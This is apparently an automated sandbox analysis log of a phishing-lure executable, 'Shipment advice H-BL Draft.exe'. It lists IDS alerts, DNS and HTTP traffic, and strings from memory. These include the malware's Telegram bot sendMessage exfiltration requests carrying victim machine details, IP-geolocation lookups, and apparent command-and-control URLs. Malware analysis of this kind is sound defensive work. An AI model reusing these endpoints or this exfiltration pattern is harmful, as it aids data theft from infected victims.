                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49755 -> 149.154.167.220:443
                    Source: unknownDNS query: name: api.telegram.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2009/03/2025%20/%2004:02:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2009/03/2025%20/%2003:29:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                    Source: Joe Sandbox View | IP Address: 149.154.167.220
                    Source: Joe Sandbox View | IP Address: 104.21.32.1
                    Source: Joe Sandbox View | IP Address: 193.122.6.168
                    Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknown | DNS query: name: checkip.dyndns.org
                    Source: unknown | DNS query: name: reallyfreegeoip.org
                    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49716 -> 193.122.6.168:80
                    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49719 -> 193.122.6.168:80
                    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49724 -> 193.122.6.168:80
                    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49727 -> 104.21.32.1:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 104.21.32.1:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 104.21.32.1:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.32.1:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 104.21.32.1:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49718 -> 104.21.32.1:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.21.32.1:443
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                    Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49717 version: TLS 1.0
                    Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49722 version: TLS 1.0
                    Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49754 version: TLS 1.0
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 07 Mar 2025 18:03:09 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 07 Mar 2025 18:03:16 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1317035907.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1378677101.00000000033B3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20a
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3722661271.0000000003C74000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3722661271.0000000003C74000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B0A000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3722661271.0000000003C74000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3722661271.0000000003C74000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3722661271.0000000003C74000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F80000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H~
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
